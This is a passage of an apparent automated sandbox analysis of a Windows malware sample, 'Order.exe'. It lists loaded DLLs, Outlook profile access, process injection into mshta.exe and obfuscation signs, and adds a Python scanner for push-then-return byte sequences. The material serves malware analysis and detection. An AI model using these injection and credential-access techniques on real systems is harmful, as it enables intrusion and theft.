                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mshta.pdbGCTL source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mkvfHfXifKJWp.exe, 00000007.00000000.1815210984.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000000.1972533286.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: qwhy.pdb source: Order.exe
                  Source: Binary string: qwhy.pdbSHA256 source: Order.exe
                  Source: Binary string: mshta.pdb source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: 0.2.Order.exe.3a55808.1.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                  Source: 0.2.Order.exe.3a6a628.2.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                  Source: 0.2.Order.exe.5130000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.cs.Net Code: SdljobcgTy System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.cs.Net Code: SdljobcgTy System.Reflection.Assembly.Load(byte[])
                  Source: Order.exeStatic PE information: 0x990045F9 [Fri May 5 20:39:21 2051 UTC]
Source: C:\Users\user\Desktop\Order.exe  Code function: 0_2_055A6772 push esp; ret  0_2_055A6779
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00405130 push 276952D9h; iretd  5_2_00405135
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_0041E990 push edx; ret  5_2_0041E991
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00404A47 push edi; retf  5_2_00404A48
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_0041AA8F push ebx; ret  5_2_0041AB40
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_0041F303 push edi; iretd  5_2_0041F30F
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00411B28 pushad; ret  5_2_00411B29
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_004033A0 push eax; ret  5_2_004033A2
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00415C53 push 4D40979Fh; retf AA07h  5_2_00415DF1
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00426DE3 push edi; ret  5_2_00426DEE
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00404E7A push ebp; ret  5_2_00404E7B
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00404EC0 push A00DC95Eh; retf  5_2_00404EF3
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_00408686 pushad; retf  5_2_00408687
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_0191225F pushad; ret  5_2_019127F9
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_019127FA pushad; ret  5_2_019127F9
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_019409AD push ecx; mov dword ptr [esp], ecx  5_2_019409B6
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_0191283D push eax; iretd  5_2_01912858
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_0192AF7D push ebp; retf 0023h  5_2_0192AFFA
Source: C:\Users\user\Desktop\Order.exe  Code function: 5_2_01911200 push eax; iretd  5_2_01911369
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_0391225F pushad; ret  9_2_039127F9
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_039127FA pushad; ret  9_2_039127F9
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_039409AD push ecx; mov dword ptr [esp], ecx  9_2_039409B6
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_0391283D push eax; iretd  9_2_03912858
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_03911200 push eax; iretd  9_2_03911369
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00B8E785 pushad; ret  9_2_00B8E786
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00B928B0 push 4D40979Fh; retf AA07h  9_2_00B92A4E
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00BA0F74 pushfd; ret  9_2_00BA0F75
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00B852E3 pushad; retf  9_2_00B852E4
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00B9B5ED push edx; ret  9_2_00B9B5EE
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00B816A4 push edi; retf  9_2_00B816A5
Source: C:\Windows\SysWOW64\mshta.exe  Code function: 9_2_00B976EC push ebx; ret  9_2_00B9779D
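The Code function entries above are push-then-return sequences: a `push imm32`/`push reg`/`pushad` immediately followed by `ret`, `retf` or `iretd`. A `push target; ret` transfers control without a `call` or `jmp`, so recursive-descent disassemblers and call-graph based heuristics lose the edge; `retf` and `iretd` variants additionally consume a segment selector or flags from the stack, which on an ordinary stack is nonsense and is a sign the bytes are either decoy code or data that a linear sweep misread. Two details in the listing are worth noticing. First, the same sequence `push 4D40979Fh; retf AA07h` appears at 5_2_00415C53 in the second Order.exe process and at 9_2_00B928B0 in mshta.exe, and the 0x0191xxxx entries of process 5 recur at identical page offsets in the 0x0391xxxx range of process 9, which is consistent with one payload mapped into both processes. Second, `push ecx; mov dword ptr [esp], ecx` is not a push/ret pair at all; the sandbox heuristic is broader than its label, so each hit needs confirming in a disassembler. The scanner below is an added example, not Joe Sandbox's detection code: it re-encodes a few of the sequences from the listing into a constructed byte string and finds them, trying every byte offset the way a sandbox would over a dumped region.

```python
"""Scan raw x86 bytes for push-then-return sequences (push X; ret/retf/iretd).

Added example, not part of the Joe Sandbox report. SAMPLE is constructed here:
it re-encodes some sequences the report lists (push 276952D9h; iretd and
push 4D40979Fh; retf AA07h among them) between an ordinary function prologue
and epilogue, so the scanner has both hits and non-hits to work on.
"""

REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
RET_PLAIN = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
RET_IMM16 = {0xC2: "ret", 0xCA: "retf"}      # ret/retf followed by a 16-bit operand


def decode_push(data: bytes, i: int):
    """Decode a push form at offset i; return (text, next_offset) or None."""
    op = data[i]
    if op == 0x68 and i + 5 <= len(data):                   # push imm32
        imm = int.from_bytes(data[i + 1:i + 5], "little")
        return f"push {imm:08X}h", i + 5
    if 0x50 <= op <= 0x57:                                  # push r32
        return f"push {REGS[op - 0x50]}", i + 1
    if op == 0x60:                                          # pushad
        return "pushad", i + 1
    if op == 0x9C:                                          # pushfd
        return "pushfd", i + 1
    return None


def decode_ret(data: bytes, i: int):
    """Decode a return at offset i; return (text, next_offset) or None."""
    if i >= len(data):
        return None
    op = data[i]
    if op in RET_PLAIN:
        return RET_PLAIN[op], i + 1
    if op in RET_IMM16 and i + 3 <= len(data):
        imm = int.from_bytes(data[i + 1:i + 3], "little")
        return f"{RET_IMM16[op]} {imm:04X}h", i + 3
    return None


def find_push_ret(data: bytes, base: int = 0):
    """Return (address, text) for every push immediately followed by a return.

    Every byte offset is tried, not only the instruction boundaries a linear
    sweep would visit, so hits inside operands or data are possible. Treat the
    output as candidates to confirm in a disassembler; the sandbox listing
    deserves the same reading.
    """
    hits = []
    for i in range(len(data)):
        push = decode_push(data, i)
        if push is None:
            continue
        ret = decode_ret(data, push[1])
        if ret is not None:
            hits.append((base + i, f"{push[0]}; {ret[0]}"))
    return hits


# Constructed input; the comments give the intended decode of each chunk.
SAMPLE = bytes.fromhex(
    "558bec"            # push ebp; mov ebp, esp      -> ordinary prologue, no hit
    "54c3"              # push esp; ret               -> hit
    "90"                # nop
    "68d9526927cf"      # push 276952D9h; iretd       -> hit
    "689f97404dca07aa"  # push 4D40979Fh; retf AA07h  -> hit
    "60c3"              # pushad; ret                 -> hit
    "9cc3"              # pushfd; ret                 -> hit
    "5dc3"              # pop ebp; ret                -> ordinary epilogue, no hit
)

if __name__ == "__main__":
    # base is a hypothetical load address chosen for readable output.
    for addr, text in find_push_ret(SAMPLE, base=0x00405130):
        print(f"{addr:08X}  {text}")
```

Feeding it a dumped region (`find_push_ret(open("dump.bin", "rb").read(), base=region_start)`) reproduces the kind of list the sandbox prints; the density of hits per kilobyte, rather than any single hit, is what separates obfuscated code from the occasional coincidental byte pair.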
Source: Order.exe  Static PE information: section name: .text entropy: 7.687118914880025
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, acW5SfF9YyUhqArulx.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sOA4rCY1Yg', 'S3v4NhRn9d', 'Mx54zKQqOI', 'OjMCmo5xHV', 'i0wCnKwmU4', 'b1sC4skFMQ', 'G6gCCP7A8j', 'vcXd3sSfiLHVpQd3sRv'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, hdFcovVamCb1xfFUc6.cs  High entropy of concatenated method names: 'pgX7nJcsQx', 'l5O7CAhNrU', 'MvT7jFxXuT', 't2o7QNypcM', 'NUH7lf1aj6', 'uqW7ThGPPS', 'aXg7WUowWG', 'YljkwLLKLV', 'QtvkpI9no4', 've8kr1fF9V'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, ebiiHAkcN1OGwcU4Ja.cs  High entropy of concatenated method names: 'Dispose', 'baMnrmGi75', 'no44Ai8rmG', 'OiOJJt5DKY', 'obEnNq9PNS', 'dNAnzGTW3b', 'ProcessDialogKey', 'TSX4m0BLqa', 'hpm4nFBTT3', 'V4o44NUg12'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, dJ3J8J9Ah8R5XdZZa3.cs  High entropy of concatenated method names: 'SQCWYqsRur', 'NaKWlhdAgF', 'yDoWTCHnNR', 'MQcWL84Anf', 'xIsWuFeLAn', 'YdkTqgtr2R', 'H2sTVvnGvH', 'l3xTwk4Dsw', 'QPZTpROCwF', 'p4ITrqdCKc'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, Y5iKKEv7ICSGI3mv4X.cs  High entropy of concatenated method names: 'mdbLQ36ZtL', 'QGWL5NoDlF', 'd1NLWSYD1S', 'MCaWNSw1Jn', 'QcmWzf2bUs', 'nJVLmCLQLq', 'qlDLnOMWyX', 'o35L4wlxb4', 'fUxLCI6h2h', 'BwwLj1KTG7'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, vsJPJ8wiUDP8Q5YU7L.cs  High entropy of concatenated method names: 'S67osukIT', 'vmpsEqYAo', 'GWmGDDQex', 't0P3hCD4i', 'JdVxQC2S5', 'PguXApGO8', 'WFA3lhp3AwWLXprWIA', 'mtiNpue92nyH8fmQma', 'SeasOU2qYkdd71lCtO', 'DjXkOXTsF'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, SiqmXvT9vhsvXyK3Br.cs  High entropy of concatenated method names: 'CNiktdlXXt', 'FKkkAATEUd', 'xCGkSiplOy', 'lQokfv3mZx', 'YsAkhNrQ94', 'FJrk2tqA3K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, YZpuslOYmfe3I2eVcA.cs  High entropy of concatenated method names: 'PLKkQDawog', 'mxUklhObx0', 'UBmk5VLDkh', 'zuYkTCJ762', 'jQukWFKJaH', 'hYnkLg0O0S', 'oUrkuhsBGr', 'ETgkgFpx8m', 'GCmkB4PRuQ', 'zt6k1l7yqU'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, jyDtlRd2O4wLdw9xdCk.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'crbdhcREsy', 'RVsdUARGlJ', 'K7ndEQGnIi', 'LVadvBb5ZB', 'OAYdqaPHLm', 'hTrdVesTFg', 'uWrdw5GVEB'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, Qktf1w6flDifV2f9qc.cs  High entropy of concatenated method names: 'ToString', 'Io70yCnTMS', 'Blg0Ag7dVp', 'MYh0SO3R5l', 'IFw0f7w9JB', 'Mi902E5OA7', 'hJy080S3S1', 'lPN0PjmH5b', 'ysW06s6PD1', 'u2v0DFfEpc'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, eZxUQI3Y6ahom9b2gf.cs  High entropy of concatenated method names: 'EuwIRJiUOM', 'GA3IxmPh9A', 'grLItf88Ka', 'RTDIAOlDvR', 'n5ZIfr5v7H', 'KWKI2TMN4Q', 'fsCIPEPGZG', 'uCJI67W2F8', 'ipfIb3Vesa', 'IOxIyVONQL'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, iraWgDCvcpMKvLysVo.cs  High entropy of concatenated method names: 'ppnnLYAbJG', 'BM2nu42KZB', 'I0pnB4nNjN', 'fsbn1WsYrn', 'JlSneTaA7m', 'Rv5n0JxEow', 'R8fimnUmSHjxdEQO3n', 'JyFeZQNt3O8Mjrv73V', 'GQVnnXq9HA', 'd0dnCCapKA'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, MWeOuwAZhJZQTvaZhv.cs  High entropy of concatenated method names: 'p1TS9rGsiLBruLsy0vm', 'PgjwYEGx44XYG3xMm3I', 'wkQWkcKtcH', 'DR0W7C4UUw', 'av8WdyA7g1', 'BNb2p6GFDapJpESHwAu', 'FL0rmeG17BNXiVf7vvJ'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, oW1mN9zbVrQALcgpAr.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'emx7IcS8P8', 'Rh37eZEl9C', 'WyP70wMKta', 'xn97K3E8Tf', 'vIJ7knNNtL', 'VKJ771I97J', 'Nic7dZVgMK'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, GsUKhkmNXVhqSn5Vh4.cs  High entropy of concatenated method names: 'Te65s2Yw3h', 'RaW5G3KBtg', 'lAp5RHYUvS', 'Mlx5xbCugD', 'HLI5eD0kdO', 'bqG50UOTNr', 'Xcu5KEIiQ7', 'rPf5kervAg', 'tj457xFgrG', 'tYq5dEsLcU'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, BvSvBD7ob3FB1JAgMd.cs  High entropy of concatenated method names: 'DWJebISlG6', 'npMeayxJ3D', 'B3uehYBS7S', 'oqseUKhYNO', 'vf6eAkHlQd', 'IoseSDNpEo', 'Q0UefCtwWa', 'mu2e27eZBC', 'UCve8ceGEy', 'PD2ePLwxmR'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, Qadts1g3OiuC6HQWNv.cs  High entropy of concatenated method names: 'rFxLHWXbrr', 'AbZLOQVWKX', 'gr5LotJikX', 'OoLLsEXkOK', 'PPvLiGkpNO', 'plXLG586te', 'nuDL3KjgGR', 'Nt0LRaf5wo', 'lYYLxQ931A', 'tYSLXnEx7l'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, yYnVrkdiwJRuEcsWluo.cs  High entropy of concatenated method names: 'jgV7HJGMHM', 'seu7O6R8RG', 'uy37oF6cZd', 'mlH7stal8j', 'Ai27ic1wT5', 'DOE7Gh31U4', 'wXa73oy4xM', 'u6u7R58XQ4', 'Wu57xAHhXA', 'w7s7XfQusH'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, e0Jj8NretasBlK1ELL.cs  High entropy of concatenated method names: 'JHCKpBnXs9', 'PBMKNW6Nvn', 'cLdkmjoiD8', 'wr0knNLePG', 'sCIKyaqojw', 'VO5KaifPc9', 'YD0KZqW9NP', 'IHKKhjFyVq', 'xTKKUmNDdg', 'qt6KEE2T3E'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.cs  High entropy of concatenated method names: 'IfjCYKHbMB', 'w8vCQdhrus', 'RA3ClcO8yG', 'HufC5Te2ra', 'ipaCTnMcUr', 'Tq3CWmpVGe', 'bPUCLCcEow', 'CdYCuHU901', 'VaXCgWvPXV', 'lrtCBRnuGh'
Source: 0.2.Order.exe.3b11f78.0.raw.unpack, XwfOjXhll0ZZ4kvBsZ.cs  High entropy of concatenated method names: 'D1Klh34gwq', 'tbXlUBqgOK', 'MkolEtsJEs', 'KeQlv7xkxW', 'GpHlqDw8nG', 'rS9lVj7YvO', 'eYSlwmptru', 'nNllpLdIMa', 'BIvlrK9YNb', 'IxZlNca0OH'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, acW5SfF9YyUhqArulx.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sOA4rCY1Yg', 'S3v4NhRn9d', 'Mx54zKQqOI', 'OjMCmo5xHV', 'i0wCnKwmU4', 'b1sC4skFMQ', 'G6gCCP7A8j', 'vcXd3sSfiLHVpQd3sRv'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, hdFcovVamCb1xfFUc6.cs  High entropy of concatenated method names: 'pgX7nJcsQx', 'l5O7CAhNrU', 'MvT7jFxXuT', 't2o7QNypcM', 'NUH7lf1aj6', 'uqW7ThGPPS', 'aXg7WUowWG', 'YljkwLLKLV', 'QtvkpI9no4', 've8kr1fF9V'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, ebiiHAkcN1OGwcU4Ja.cs  High entropy of concatenated method names: 'Dispose', 'baMnrmGi75', 'no44Ai8rmG', 'OiOJJt5DKY', 'obEnNq9PNS', 'dNAnzGTW3b', 'ProcessDialogKey', 'TSX4m0BLqa', 'hpm4nFBTT3', 'V4o44NUg12'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, dJ3J8J9Ah8R5XdZZa3.cs  High entropy of concatenated method names: 'SQCWYqsRur', 'NaKWlhdAgF', 'yDoWTCHnNR', 'MQcWL84Anf', 'xIsWuFeLAn', 'YdkTqgtr2R', 'H2sTVvnGvH', 'l3xTwk4Dsw', 'QPZTpROCwF', 'p4ITrqdCKc'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, Y5iKKEv7ICSGI3mv4X.cs  High entropy of concatenated method names: 'mdbLQ36ZtL', 'QGWL5NoDlF', 'd1NLWSYD1S', 'MCaWNSw1Jn', 'QcmWzf2bUs', 'nJVLmCLQLq', 'qlDLnOMWyX', 'o35L4wlxb4', 'fUxLCI6h2h', 'BwwLj1KTG7'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, vsJPJ8wiUDP8Q5YU7L.cs  High entropy of concatenated method names: 'S67osukIT', 'vmpsEqYAo', 'GWmGDDQex', 't0P3hCD4i', 'JdVxQC2S5', 'PguXApGO8', 'WFA3lhp3AwWLXprWIA', 'mtiNpue92nyH8fmQma', 'SeasOU2qYkdd71lCtO', 'DjXkOXTsF'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, SiqmXvT9vhsvXyK3Br.cs  High entropy of concatenated method names: 'CNiktdlXXt', 'FKkkAATEUd', 'xCGkSiplOy', 'lQokfv3mZx', 'YsAkhNrQ94', 'FJrk2tqA3K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, YZpuslOYmfe3I2eVcA.cs  High entropy of concatenated method names: 'PLKkQDawog', 'mxUklhObx0', 'UBmk5VLDkh', 'zuYkTCJ762', 'jQukWFKJaH', 'hYnkLg0O0S', 'oUrkuhsBGr', 'ETgkgFpx8m', 'GCmkB4PRuQ', 'zt6k1l7yqU'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, jyDtlRd2O4wLdw9xdCk.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'crbdhcREsy', 'RVsdUARGlJ', 'K7ndEQGnIi', 'LVadvBb5ZB', 'OAYdqaPHLm', 'hTrdVesTFg', 'uWrdw5GVEB'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, Qktf1w6flDifV2f9qc.cs  High entropy of concatenated method names: 'ToString', 'Io70yCnTMS', 'Blg0Ag7dVp', 'MYh0SO3R5l', 'IFw0f7w9JB', 'Mi902E5OA7', 'hJy080S3S1', 'lPN0PjmH5b', 'ysW06s6PD1', 'u2v0DFfEpc'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, eZxUQI3Y6ahom9b2gf.cs  High entropy of concatenated method names: 'EuwIRJiUOM', 'GA3IxmPh9A', 'grLItf88Ka', 'RTDIAOlDvR', 'n5ZIfr5v7H', 'KWKI2TMN4Q', 'fsCIPEPGZG', 'uCJI67W2F8', 'ipfIb3Vesa', 'IOxIyVONQL'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, iraWgDCvcpMKvLysVo.cs  High entropy of concatenated method names: 'ppnnLYAbJG', 'BM2nu42KZB', 'I0pnB4nNjN', 'fsbn1WsYrn', 'JlSneTaA7m', 'Rv5n0JxEow', 'R8fimnUmSHjxdEQO3n', 'JyFeZQNt3O8Mjrv73V', 'GQVnnXq9HA', 'd0dnCCapKA'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, MWeOuwAZhJZQTvaZhv.cs  High entropy of concatenated method names: 'p1TS9rGsiLBruLsy0vm', 'PgjwYEGx44XYG3xMm3I', 'wkQWkcKtcH', 'DR0W7C4UUw', 'av8WdyA7g1', 'BNb2p6GFDapJpESHwAu', 'FL0rmeG17BNXiVf7vvJ'
